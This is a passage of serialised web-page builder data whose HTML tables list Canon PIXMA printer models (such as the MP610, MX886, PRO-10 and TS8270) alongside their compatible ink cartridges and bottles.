width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td 